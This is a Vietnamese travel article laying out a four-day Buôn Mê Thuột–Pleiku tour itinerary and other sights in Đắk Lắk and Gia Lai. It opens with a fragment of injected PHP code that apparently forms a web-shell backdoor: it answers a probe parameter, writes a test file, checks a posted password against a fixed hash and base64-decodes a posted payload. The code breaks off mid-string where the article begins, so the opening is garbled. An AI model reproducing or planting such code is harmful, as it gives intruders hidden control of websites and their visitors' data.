function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Lịch trình tour Buôn Mê Thuột - Pleiku 4 ngày 3 đêm chi tiết

Lịch trình tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm chi tiết

29/06/2023 LamThanhHien

Tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm khám phá vùng Tây Nguyên đại ngàn hùng hùng vĩ. Đưa bạn tránh xa sự ồn ào, náo nhiệt của phố thị, tìm về sự yên bình của núi rừng. Bạn sẽ được khám phá một vùng đất sử thi hào hùng, những ngôi nhà Rông mang tính biểu tượng, không gian văn hóa cồng chiêng Tây Nguyên đặc sắc. Cùng Đi Để Đến khám phá lịch trình tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm siêu chi tiết bên dưới nhé! 

BUÔN MÊ THUỘT – “THỦ PHỦ CÀ PHÊ” CỦA CẢ NƯỚC 

Buôn Mê Thuột là thành phố lớn nhất của tỉnh Đắk Lắk, nằm ở miền trung Việt Nam. Đây là một trong những khu vực trung tâm vận chuyển và giao thương vùng Tây Nguyên.

Không chỉ được biết đến nhờ hương vị cà phê Ban mai trứ danh mà Buôn Mê Thuột còn sở hữu rất nhiều những điểm nổi bật của văn hóa vùng Đại ngàn. Thành phố này còn có một số địa danh nổi tiếng mà du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm không nên bỏ qua như hồ Ea Kao, Chùa Linh Quy Pháp Ấn, sông Serepok, và quảng trường 10/3.

Tour Buôn Mê Thuột - Pleiku 4 ngày 3 đêm - Sơ lược Buôn Mê Thuột

Không chỉ được biết đến nhờ hương vị cà phê Ban mai trứ danh, mà Buôn Mê Thuột còn sở hữu rất nhiều những điểm nổi bật của văn hóa vùng Đại ngàn

Bên cạnh đó, Buôn Mê Thuột còn được mẹ thiên nhiên ưu ái ban tặng cho những thác nước kỳ kỳ vĩ, những hồ nước trong xanh rộng lớn hay những ngôi làng cà phê nổi tiếng. Ngoài ra, đây còn là trung tâm sản xuất cà phê và cao su của Việt Nam, với nhiều nông trại và nhà máy sản xuất cà phê và cao su nổi tiếng mà du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm không thể bỏ qua.

Du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm có thể tham gia các hoạt động du lịch như mua sắm sản phẩm địa phương. Hay đi dạo quanh các hồ, thác nước và cửa khẩu, tham quan các đền chùa, tìm hiểu văn hóa vùng Tây Nguyên và thưởng thức ẩm thực tại đây cũng rất thú vị. 

>>>Xem thêm: Tour Buôn Mê Thuột – Khám phá xứ sở cà phê qua 5+ điểm HOT

PLEIKU – PHỐ NÚI CỦA TÂY NGUYÊN

Thành phố Pleiku là trung tâm của tỉnh Gia Lai. Là thành phố có diện tích lớn thứ 3 tại vùng Tây Nguyên chỉ đứng sau Buôn Mê Thuột và Đà Lạt. Nơi đây gây thích thú cho nhiều khách du lịch tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm bởi không khí vô cùng trong lành và mát mẻ, cảnh quan thiên nhiên thì rất hữu tình và còn hoang sơ. 

Tour Buôn Mê Thuột - Pleiku 4 ngày 3 đêm - Sơ lược Pleiku

Thành phố Pleiku là trung tâm của tỉnh Gia Lai, là thành phố có diện tích lớn thứ 3 tại vùng Tây Nguyên chỉ sau Buôn Mê Thuột và Đà Lạt

Với địa hình đồi núi và khí hậu ôn đới, Pleiku có nhiều điểm đến du lịch hấp dẫn. Các điểm đến nổi bật bao gồm hồ T’Nưng, đỉnh đèo An Khê, khu bảo tồn động vật Hoàng Liên, chùa Tây Thiên,… Ngoài ra, thành phố cũng là nơi nhiều di sản lịch sử và văn hóa với các điểm thăm quan như Đền Y Jut, đường mòn Hồ Chí Minh,…dành cho khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm khám phá.

Bên cạnh đó, Pleiku còn sở hữu một nền văn hóa, lịch sử lâu đời. Cùng với đó là cuộc sống đa sắc màu đến từ các dân tộc anh em như Bahnar và Jarai. Trong đó nổi bật lên những đặc trưng của Pleiku nói riêng và Gia Lai nói chung là những nhà rông, tượng nhà mồ và các lễ hội truyền thống khác. Du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm có thể tham gia một số lễ hội tại đây để hiểu rõ hơn về phong tục tập quán của người dân địa phương. 

Đặc biệt, văn hóa cồng chiêng Tây Nguyên đã được UNESCO công nhận là “Kiệt tác phi vật thể của nhân loại” sẽ không làm cho du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm thất vọng. 

CHƯƠNG TRÌNH TOUR BUÔN MÊ THUỘT – PLEIKU 4 NGÀY 3 ĐÊM CHI TIẾT 

Ngày 1: TPHCM/ Hà Nội – PLEIKU – BIỂN HỒ 

Sáng: Hướng dẫn viên và xe đón quý đoàn khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm tại sân bay Pleiku (Gia Lai), sau đó tiến hành tham quan Biển hồ T’Nưng:

 • Biển hồ T’Nưng: Đây là một một hồ nước ngọt nằm ở phía Bắc của TP. Pleiku. Biển Hồ vốn là 3 miệng núi lửa cổ thông với nhau đã ngừng hoạt động từ hàng trăm triệu năm qua, dù đứng từ xa bạn cũng sẽ thấy rõ. Hồ T’Nưng là một trong những hồ đẹp nhất tại Tây Nguyên, khi gió to kèm theo sóng lớn nên nó còn có tên gọi khác là Biển Hồ. Còn người dân địa phương thường gọi là T’Nưng, có nghĩa là “hồ trên núi”. 
Tour Buôn Mê Thuột - Pleiku 4 ngày 3 đêm - Biển hồ T’Nưng

Biển Hồ vốn là 3 miệng núi lửa cổ thông với nhau đã ngừng hoạt động từ hàng trăm triệu năm qua

Trưa: Khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm dùng cơm trưa và nghỉ ngơi. 

Chiều: Tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm tiếp tục với các địa điểm tham quan: 

 • Đồi chè Biển Hồ: Đây là một trong những địa điểm du lịch nổi tiếng nằm ở phía Đông Bắc của tỉnh Gia Lai. Với vị thế nằm ở gần hồ T’Nưng là nơi cung cấp thủy lợi chính cho việc hình thành và phát triển của nương chè và ngày nay người ta gọi là “Biển Hồ chè Gia Lai”. Hiện nay, khu vực này có diện tích vượt qua 100ha, bao phủ một màu xanh tưởng chừng như vô tận, vô cùng mướt mắt. 
Tour Buôn Mê Thuột - Pleiku 4 ngày 3 đêm - Đồi chè Biển Hồ

Đồi chè Biển Hồ mang vẻ đẹp thanh mát giữ vùng đất đỏ bazan Tây Nguyên

 • Chùa Minh Thành: Đây là một ngôi chùa mang phong cách kiến trúc đặc biệt, mang hơi hướng nghệ thuật của Nhật Bản. Tọa lạc cách trung tâm thành phố Pleiku khoảng 2km. Chùa được xây dựng từ năm 1964 dưới sự chỉ đạo của Hòa thượng Thích Giác Đạo. Điểm đặc biệt làm cho ngôi chùa này trở nên nổi tiếng đó chính là kiến trúc tổng thể đã hình thành nên một bức tranh lộng lẫy, đa màu sắc. Hệt như một cung điện thu nhỏ nằm trong lòng của “phố núi” – Pleiku vậy. 

Tối: Đoàn dùng cơm tối tại nhà hàng và khám phá TP. Pleiku về đêm, khách du lịch tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm có thể thưởng thức một số đặc sản của Gia Lai như: Phở hai tô, bún cua, bò một nắng,…

Ngày 2: ĐẬP THỦY ĐIỆN YALY – TP. BUÔN MÊ THUỘT 

Sáng: Khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm dùng buffet sáng tại khách sạn. Sau đó tiến hành tham quan nhà máy thủy điện Yaly. Công trình Thủy điện Yaly là bậc thang thứ 3 – cũng là bậc thang lớn nhất trong tổng số 10 bậc thang của thủy điện trên dòng sông Sê San huyền thoại. Thủy điện Yaly có nhiệm vụ sản xuất và cung cấp cho nước ta trung bình mỗi năm 3,650 tỷ kWh, góp phần tạo động lực phát triển kinh tế – xã hội của vùng Tây Nguyên. 

Tour Buôn Mê Thuột - Pleiku 4 ngày 3 đêm - Nhà máy thủy điện Yaly

Công trình Thủy điện Yaly là bậc thang thứ 3 – cũng là bậc thang lớn nhất trong tổng số 10 bậc thang của thủy điện trên dòng sông Sê San

Trưa: Đoàn dùng cơm trưa bằng đặc sản những loại cá trên sông Sê San. Sau khi ăn cơm trưa xong khách du lịch tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm khởi hành đến TP. Buôn Mê Thuột của tỉnh Đắk Lắk. 

Chiều: Quý khách sẽ được tham quan Nông trại cà phê Đắk Lắk và chụp ảnh lưu niệm tại đây.

Tối: Quý khách nhận phòng và đi ăn tối tại nhà hàng. Sau khi ăn tối xong, khách du lịch tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm có thể đi tham quan TP. Buôn Mê Thuột về đêm. 

Ngày 3: BUÔN MÊ THUỘT – BẢN ĐÔN – DRAY NUR 

Sáng: Quý khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm dùng điểm tâm sáng bằng buffet tại khách sạn. Sau khi ăn sáng xong Hướng dẫn viên đưa quý khách đi tham quan Bản Đôn. Đây được nhiều người biết đến là nơi săn bắt và thuần dưỡng loài voi rừng.

Bản Đôn trước đây từng là thủ phủ của tỉnh Đắk Lắk, sau này để tiện cho việc giao thương và phát triển kinh tế xã hội, người Pháp đã cho với cơ quan hành chính về TP. Buôn Mê Thuột như hiện nay.

Tour Buôn Mê Thuột - Pleiku 4 ngày 3 đêm - Bản Đôn

Bản Đôn được nhiều người biết đến là nơi săn bắt và thuần dưỡng loài voi rừng

Đến với Bản Đôn, du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm có thể trải nghiệm được cưỡi lên lưng của những chú voi to lớn. Hay ngắm nhìn cảnh vật hùng vĩ của Rừng nguyên sinh Quốc gia Yok Đôn, nhà sàn cổ 120 năm của người Lào, ngắm cầu treo và sống Serepok và thăm buôn làng của các dân tộc ít người tại đây như: Ede, M’Nông, Lào,…

Trưa: Khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm dùng cơm trưa tại nhà hàng địa phương. 

Chiều: Cuộc hành trình tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm tiếp tục với các địa điểm:

 • Khu du lịch thác Dray Nur: Thác Dray Nur là một trong những ngọn thác mang nét đẹp hoang dại và hùng vĩ nhất tại Tây Nguyên. Đặt chân đến đây, bạn sẽ được hòa mình vào không gian trong xanh bao la, hòa mình với thiên nhiên và bầu không khí vô cùng trong lành, mát mẻ. 
 • Bảo tàng dân tộc Việt Nam: Đây được xem như là một không gian thu nhỏ của núi rừng Tây Nguyên đại ngàn với các loài động vật quý hiếm và thực vật là cây công nghiệp chủ lực của vùng được trưng bày tại đây.
  Cùng với đó là sự tái hiện sống động nền văn hóa của 44 dân tộc anh em cùng sinh sống tại Đắk Lắk. Trong đó nổi bật nhất là không gian văn hóa cồng chiêng tây Nguyên, các tập tục trong sinh hoạt và đời sống sản xuất của người bản địa.
Tour Buôn Mê Thuột - Pleiku 4 ngày 3 đêm - Bảo tàng các dân tộc Việt Nam

Bảo tàng các dân tộc Việt Nam được xem như là một không gian thu nhỏ của núi rừng Tây Nguyên đại ngàn

 • Khu du lịch Buôn Ako Ae: Đây là một địa điểm du lịch sinh thái hội tụ đủ những tài nguyên thiên nhiên đặc sắc của Buôn Mê Thuột như: Thác, suối và những cánh rừng cà phê bạt ngàn. Đến đây khách du lịch tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm không ngừng mê đắm trước những con dốc quanh co, bungalow, homestay hay những căn nhà sàn đặc biệt.
  Ngoài ra khi đến đây, khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm còn có cơ hội tìm hiểu về những nét đẹp văn hóa của người dân tộc Êđê và thưởng thức ẩm thực địa phương. 

Tối: Đoàn dùng cơm tối và khám phá Buôn Mê Thuột về đêm. Sau đó quý khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm nghỉ ngơi tại khách sạn. 

Ngày 4: LÀNG CÀ PHÊ – TPHCM/ HÀ NỘI 

Sáng: Đoàn dùng bữa buffet tại khách sạn. Sau đó đoàn trả phòng khách sạn và tham quan địa điểm cuối cùng trong lịch trình tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm là Làng cà phê Trung Nguyên.

 • Làng cà phê Trung Nguyên: Nơi đây bao gồm các khu vực như khu thưởng thức cà phê, không gian vật dụng của người dân tộc, quy trình làm ra cà phê,… Đặc biệt nơi đây còn có những chiếc cồng chiêng đặt tại những nơi mà du khách có thể nhìn thấy và chiêm ngưỡng từng đường nét được chạm trổ trên đó.
  Bên cạnh đó cũng có các loại vũ khí, những công cụ mà người dân địa phương dùng trong đời sống sinh hoạt thường ngày. Trong đó cũng có các vật dụng thể hiện trong văn hóa tâm linh nơi đây. 
Tour Buôn Mê Thuột - Pleiku 4 ngày 3 đêm - Làng cà phê Trung Nguyên

Làng cà phê Trung Nguyên được xem là một địa điểm mang đẩm bản sắc dấu ấn Tây Nguyên

Trưa: Khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm ăn trưa tại nhà hàng. 

Chiều: Sau khi ăn trưa xong đoàn di chuyển ra sân bay Buôn Mê Thuột, kết thúc tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm. Hướng dẫn viên chào tạm biệt và hẹn gặp lại quý khách trong chặng hành trình tới.

Lưu ý: Các địa điểm trong lịch trình có thể thay đổi để phù hợp với tình hình thực tế của du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm. Nhưng vẫn đảm bảo đầy đủ các điểm đến được nêu trong lịch trình!

>>>Xem thêm: Cẩm nang đi tour Buôn Mê Thuột 4 ngày 3 đêm từ A đến Z

CÁC ĐỊA ĐIỂM CHECK-IN KHÁC TẠI ĐẮK LẮK 

1. Chùa Sắc Tứ Khải Đoan 

Địa điểm đầu tiên mà khách du lịch tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm không nên bỏ qua là Chùa Sắc Tứ Khải Đoan hay còn được người dân địa phương gọi bằng những cái tên khác như chùa Lớn, chùa Tỉnh Hội,.. Được biết tên chùa được tạo nên từ sự ghép nối từ tên của vua Khải Định và Hoàng Thái hậu Đoan Huy, vợ của vua Khải Định. Đây cũng là ngôi chùa xuất hiện đầu tiên trên mảnh đất Tây Nguyên đại ngàn. 

Tour Buôn Mê Thuột - Pleiku 4 ngày 3 đêm - Chùa Sắc Tứ Khải Đoan 

Chùa Sắc Tứ Khải Đoan đang vươn mình trở thành một địa điểm trung tâm Phật giáo lớn nhất tại miền Trung Việt Nam

Chùa Sắc Tứ Khải Đoan với diện tích lên đến 7 mẫu đất, vô cùng đồ sộ và tráng lệ. Đây chính là một địa điểm tâm linh độc đáo mà bất kỳ du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm nào cũng không nên bỏ qua. Chùa được thành lập từ năm 1951, và liên tục được trùng tu cũng như mở rộng thêm vào những năm sau này. Chùa đang vươn mình trở thành một địa điểm trung tâm Phật giáo lớn nhất tại miền Trung Việt Nam. 

Để đến được chùa Sắc Tứ Khải Đoan cũng khá dễ dàng. Từ trung tâm TP. Buôn Mê Thuột bạn chỉ cần di chuyển khoảng 2km là có thể đến được chùa. Ngôi chùa mang đậm phong cách kiến trúc cung đình Huế, kết hợp cùng kiến trúc nhà sàn của Tây Nguyên đã tạo nên một tổng thể vô cùng hài hòa, đặc biệt. 

Chùa được làm chủ yếu bằng gỗ. Tông màu nâu trầm của gỗ càng làm cho ngôi chùa tăng tính trầm mặc và cổ kính hơn. Từng đường nét được chạm trổ trên những bức tường hay cột chùa cũng rất tinh xảo và tỉ mỉ. Ngôi chùa vô cùng uy nghi và vững trãi giữa đất trời miền Trung đầy nắng và gió.

2. Bảo Tàng Cà Phê Buôn Mê Thuột 

Bảo tàng Cà phê Buôn Mê Thuột là một điểm tham quan nổi tiếng của thành phố Buôn Ma Thuột, tỉnh Đắk Lắk. Như tên gọi của nó, đây là một bảo tàng trưng bày và giới thiệu về ngành công nghiệp cà phê của khu vực Tây Nguyên nói chung và của tỉnh Đắk Lắk nói riêng.

Tour Buôn Mê Thuột - Pleiku 4 ngày 3 đêm - Bảo Tàng Cà Phê Buôn Mê Thuột 

Bảo tàng Cà phê Buôn Mê Thuột là một điểm tham quan nổi tiếng mà khách tour Buôn Mê Thuột Pleiku 4 ngày 3 đêm không nên bỏ qua

Bảo tàng nằm trong khuôn viên của Trung tâm Triển lãm và Xúc tiến Thương mại của tỉnh Đắk Lắk. Nơi đây bao gồm các phòng trưng bày có đầy đủ các sản phẩm cà phê, từ giai đoạn trồng trọt và chăm sóc cho đến quá trình chế biến và đóng gói.

Du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm có thể tìm hiểu về lịch sử và quá trình phát triển ngành cà phê của Việt Nam và Tây Nguyên. Cũng như tìm hiểu về nghệ thuật pha chế cà phê và thưởng thức đặc sản cà phê nổi tiếng của địa phương.

Bảo tàng cà phê Buôn Ma Thuột là một điểm tham quan lý thú cho những khách du lịch tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm yêu thích cà phê và muốn khám phá nét độc đáo của ngành công nghiệp cà phê của Tây Nguyên. Ngoài ra, bạn cũng có thể mua sắm các sản phẩm cà phê tại cửa hàng bên trong bảo tàng về làm quà cho bạn bè, gia đình và người thân. 

>>>Xem thêm: Review lịch trình du lịch Buôn Mê Thuột 3 ngày 3 đêm

3. Làng Cà Phê Trung Nguyên 

Làng Cà Phê Trung Nguyên là một khu du lịch, điểm tham quan nổi tiếng tại thành phố Buôn Mê Thuột. Đây là một khu đất rộng lớn, có diện tích khoảng 456 ha, nằm ở vị trí thuận lợi trên tuyến đường từ thành phố Buôn Ma Thuột đến thị trấn Buôn Hồ, cách thuộc xã Ea Tu của huyện Cư M’gar khoảng 13km.

Tour Buôn Mê Thuột - Pleiku 4 ngày 3 đêm - Làng Cà Phê Trung Nguyên 

Du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm có thể tham quan Làng cà phê Trung Nguyên để tìm hiểu về lịch sử, quy trình sản xuất cà phê

Làng Cà Phê Trung Nguyên được xây dựng với mục tiêu tạo nên một không gian giải trí, vui chơi, học tập và trải nghiệm văn hóa cà phê độc đáo của Tây Nguyên cho du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm.

Trong khuôn viên là những trang trại cà phê đẹp mắt, một số làm theo phong cách Pháp, và đặc biệt ở đây có trang trại nuôi bò giống Angus của Mỹ. Ngoài ra, còn có các hoạt động giải trí như chụp ảnh, tham quan trang trại, cùng nhiều chương trình văn hoá văn nghệ, trình diễn âm nhạc…

Du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm có thể tham quan Làng cà phê Trung Nguyên để tìm hiểu về lịch sử, quy trình sản xuất, trải nghiệm hương vị còn nguyên sơ của cà phê. Ngoài ra, đây cũng là điểm dừng chân lý tưởng với các khu vực cung cấp thông tin, bảo tàng dân tộc Tây Nguyên, vườn cà phê, khu ẩm thực,… 

4. Cụm Thác Dray Sap, Dray Nur, Gia Long

Cụm thác Dray Sap, Dray Nur, Gia Long là cụm ba thác nước đẹp mắt, được bao bọc bởi rừng núi Tây Nguyên tươi tốt và nguyên sinh trên con sông Serepok

Thác Dray Sap (hay còn gọi là thác Chồng) là thác cao nhất trong cụm ba thác, có chiều cao khoảng 30 mét và được chia thành nhiều tầng nhỏ. Thác này tạo ra những cơn mưa nước mịn màng, vòm rộng và nước chảy xuống tạo ra cảnh tượng ấn tượng và thu hút sự chú ý của du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm.

Tour Buôn Mê Thuột - Pleiku 4 ngày 3 đêm - Cụm Thác Dray Sap, Dray Nur, Gia Long

Cận cảnh vẻ đẹp hùng vĩ và nên thơ của cụm thác Dray Sap, Dray Nur, Gia Long

Thác Dray Nur (hay còn gọi là thác Vợ) có chiều cao khoảng 20 mét, được coi là quyến rũ hơn tháp Dray Sap, với dòng nước chảy êm ái và màu xanh ngọc lấp lánh.

Thác Gia Long nằm cách Thác Dray Nur khoảng 10km, có chiều cao khoảng 20 mét. Thác nước này nổi bật với những cột nước phun lên rất cao và xoáy tròn, tạo ra một màn “trình diễn” cực kỳ độc đáo và hấp dẫn.

Du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm đến với cụm thác Dray Sap, Dray Nur, Gia Long có thể tắm mát hoặc tản bộ trong không khí trong lành của rừng núi, ngắm cảnh và chiêm ngưỡng vẻ đẹp tự nhiên của thiên nhiên Tây Nguyên. Đây chắc chắn sẽ là điểm đến lý tưởng cho những ai yêu thích khám phá và trải nghiệm hòa mình với thiên nhiên. 

>>>Xem thêm: Dân phượt thích thú với homestay “Tổ Ong” ở Buôn Mê Thuột

5. Vườn Quốc Gia Yok Đôn

Vườn quốc gia Yok Đôn nằm trên dãy núi Yok Đôn và có diện tích khoảng 115.545 ha, vườn quốc gia này bao gồm những khu rừng nguyên sinh rậm rạp và phong cảnh thiên nhiên đặc biệt được bảo tồn. Nếu bạn đã từng nghe qua ca khúc “Chú voi con ở Bản Đôn” mà muốn gặp trực tiếp những chú voi đó thì hãy đến với Vườn quốc gia Yok Đôn ngay nhé. 

Tour Buôn Mê Thuột - Pleiku 4 ngày 3 đêm - Vườn Quốc Gia Yok Đôn

Vườn quốc gia Yok Đôn là khu rừng đăc dụng lớn nhất tại Việt Nam

Vườn quốc gia Yok Đôn là nơi sống của nhiều loài động vật hoang dã và voi rừng. Bao gồm cả một số loài quý hiếm và đang có nguy cơ tuyệt chủng như sơn dương, hươu nai, vàng răng, hổ, báo. Ngoài ra, Vườn quốc gia còn có những loài thực vật đa dạng phong phú, từ những cây bụi nhỏ đến các cây đại thụ cao lớn.

Du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm đến với Vườn quốc gia Yok Đôn có thể tận hưởng các hoạt động giải trí trong tự nhiên. Một trong số đó nổi bật nhất là ngắm cảnh, picnic, đi bộ, đi phượt, thám hiểm các con đường rừng, và đặc biệt là dạo chơi trên lưng voi. Vườn quốc gia Yok Đôn là một điểm đến lý tưởng cho những ai yêu thích thiên nhiên và mong muốn tìm hiểu về đời sống hoang dã của rừng núi Tây Nguyên. 

NHỮNG ĐỊA ĐIỂM CHECK-IN KHÁC Ở GIA LAI 

1. Núi Lửa Chư Đăng Ya 

Núi lửa Chư Đăng Ya là một ngọn núi lửa đã ngừng hoạt động cách đây hàng triệu năm với độ cao 1858 mét, nằm tại huyện Chu Pah, tỉnh Gia Lai. Nơi đây chỉ cách hồ T’Nưng chừng 20km, đây được coi là “cung đường vàng” trọng điểm du lịch của tỉnh Gia Lai. 

Tour Buôn Mê Thuột - Pleiku 4 ngày 3 đêm - Núi Lửa Chư Đăng Ya 

Núi lửa Chư Đăng Ya là ngọn núi đã từng hoạt động dữ dội ở vùng Tây Nguyên trong quá khứ

Núi lửa Chư Đăng Ya, trong tiếng đồng bào Jrai có nghĩa là củ gừng dại. Đây là ngọn núi đã từng hoạt động dữ dội ở vùng Tây Nguyên trong quá khứ. Nằm núp mình giữa đại ngàn rộng lớn, từ trên cao nhìn xuống nó trông giống như một cái phễu khổng lồ. Miệng núi tròn mang vẻ màu mỡ từ những lớp nham thạch tạo nên qua hàng triệu năm. 

Núi lửa Chư Đăng Ya thu hút du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm đến tham quan và khám phá địa danh này bởi vẻ đẹp hoang sơ của nó, đồng thời cũng là điểm đến của những người yêu thích thể thao đặc biệt là leo núi. Tuy nhiên, do tính chất của núi lửa nên người tham gia phải có kỹ năng và kinh nghiệm để có thể leo đến đỉnh núi và khám phá nó.

Ngoài ra, khu vực xung quanh núi lửa Chư Đăng Ya còn có nhiều làng bản với văn hóa đặc trưng của dân tộc Ê Đê, là một điểm đến thú vị cho người yêu thích khám phá văn hóa và lối sống của người dân bản địa. 

>>>Xem thêm: Du lịch Gia Lai: Ghé phố núi thưởng ngoạn cảnh sắc nên thơ

2. Biển Hồ T’Nưng 

Biển Hồ T’Nưng là một trong những điểm du lịch nổi tiếng của Gia Lai. Biển Hồ có diện tích khoảng 230 ha, với độ sâu trung bình 20 – 30 mét, và được bao bọc bởi những khu rừng nhiệt lân cận.

Tour Buôn Mê Thuột - Pleiku 4 ngày 3 đêm - Biển Hồ T’Nưng 

Biển Hồ T’Nưng là nơi lý tưởng cho những người muốn thoát khỏi cuộc sống bộn bề, tìm lại sự bình yên và thư giãn

Biển Hồ thực chất là một miệng núi lửa cũng đã ngừng hoạt động từ vài trăm triệu năm trước. Bên bờ hồ lúc nào cũng đượm những sắc màu rực rỡ của hoa, lá. Đặc biệt là loài hoa cúc dã quỳ vàng rực một vùng trời, hay những đóa hoa pơ lang xanh mướt, hoa gạo, khi lại là hoa đơn, hoa mua phủ xanh một mảng triền đồi. 

Biển Hồ T’Nưng mang một nét hoang sơ đẹp mê hồn. Đến đây du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm có thể tham gia các hoạt động thú vị như chèo thuyền kayaking, tắm hồ hoặc đi dạo bên bờ hồ cũng rất thú vị và thư giãn. 

Trong khi đó, với không gian tự nhiên thuần khiết và yên tĩnh, Biển Hồ T’Nưng là nơi lý tưởng cho những người muốn thoát khỏi cuộc sống bộn bề, tìm lại sự bình yên và thư giãn. Đây chắc chắn sẽ là một hành trình khám phá tuyệt vời tại vùng núi Tây Nguyên, giúp cho du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm hiểu hơn về văn hóa và lối sống của người dân bản địa. 

3. Bảo Tàng Tỉnh Gia Lai 

Bảo tàng tỉnh Gia Lai là một trong những điểm đến văn hóa quan trọng tại thành phố Pleiku, tỉnh Gia Lai. Bảo tàng nằm trên đường Yên Đỗ, cách trung tâm thành phố khoảng 5 km. Nơi đây lưu giữ lại các hiện vật có giá trị cao như: Cồng chiêng, trống của người đồng bào dân tộc Bahnar, Jarai; ché cổ quý hiếm và nhiều hiện vật có giá trị khác của cộng đồng người dân tộc Jrai và Bahnar. 

Tour Buôn Mê Thuột - Pleiku 4 ngày 3 đêm - Bảo Tàng Tỉnh Gia Lai 

Bảo tàng tỉnh Gia Lai được xây dựng vào những năm 1980 với mục đích tôn vinh và bảo tồn di sản văn hóa của các dân tộc thiểu số tại địa phương

Bảo tàng tỉnh Gia Lai được xây dựng vào những năm 1980 với mục đích tôn vinh và bảo tồn di sản văn hóa của các dân tộc thiểu số tại địa phương. Bảo tàng có các phòng trưng bày với hàng ngàn những hiện vật đặc sắc thể hiện văn hoá và lịch sử của nhiều dân tộc khác nhau. Bao gồm những tác phẩm điêu khắc, bài thơ, đồ gốm, trang phục và các vật dụng hàng ngày. 

Những hiện vật mang tính lịch sử và văn hóa đặc trưng của Tây Nguyên được thể hiện một cách sinh động và rõ ràng. Bảo tàng cũng tổ chức các triển lãm, hội thảo và các hoạt động văn hóa khác nhằm phát triển và giới thiệu văn hóa của địa phương đến các du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm.

Bảo tàng tỉnh Gia Lai là một địa điểm thú vị để khám phá lịch sử và văn hóa đặc sắc của Tây Nguyên, đồng thời giúp khách du lịch hiểu rõ hơn về sự đa dạng và phong phú của các dân tộc thiểu số tại địa phương. 

>>>Xem thêm: Du lịch Đắk Lắk: Thưởng ngoạn cảnh đẹp kỳ vỹ giữa đại ngàn

4. Chùa Bửu Minh 

Chùa Bửu Minh là một trong những ngôi chùa xuất hiện sớm nhất tại Gia Lai. Quá trình xây dựng chùa gắn liền với sự hình thành Sở Trà Biển Hồ trong thời kỳ Pháp thuộc. Cho đến đầu thế kỷ 20, những cư dân từ vùng duyên hải đến đây để xây dựng một ngôi làng có tên là Cỏ May. Giữa khung cảnh “rừng thiêng nước độc”, người dân dựng nên “Sơn Hải miếu” – được xem là tiền thân của chùa Bửu Minh sau này. 

Tour Buôn Mê Thuột - Pleiku 4 ngày 3 đêm - Chùa Bửu Minh 

Chùa Bửu Minh là một trong những ngôi chùa xuất hiện sớm nhất tại Gia Lai

Năm 1936, chùa được khởi công xây dựng lần đầu với tên gọi là Chùa Phật Học. Sau đó qua các lần trùng tu và tôn tạo khác cho đến khi chùa chính thức mang tên Bửu Minh vào năm 1961. Cho đến nay, những ngôi nhà của công nhân đồn điền ngày ấy không còn nhiều. Nhưng còn rất nhiều gốc trà với tuổi đời lên đến hàng trăm năm vẫn còn hiện hữu trong khuôn viên chùa. 

Mái chùa cong vút mềm mại với kiến trúc tựa như một con thuyền độc mộc, xây dựng bằng bê tông cốt thép hiện đại. Diện tích của ngôi chính điện lên đến 520m2, cao 47,25 mét. Mặt chùa hướng Tây nhìn về hồ T’Nưng huyền thoại, đầu “gối” vào núi Tiên Sơn.

Đây được xem là vị trí đắc địa và phong thủy tốt cho mạch đạo của ngôi chùa. Đây là một địa điểm tâm linh độc đáo mà du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm nhất định phải đến thăm nếu có dịp ghé Gia Lai.  

5. Quảng Trường Đại Đoàn Kết 

Mỗi một quảng trường trên mảnh đất Gia Lai đều mang một ý nghĩa lịch sử phát triển, cũng như mang những điểm đặc trưng của thành phố. Và quảng trường Đại Đoàn Kết là một trong số đó.

Tour Buôn Mê Thuột - Pleiku 4 ngày 3 đêm - Quảng Trường Đại Đoàn Kết 

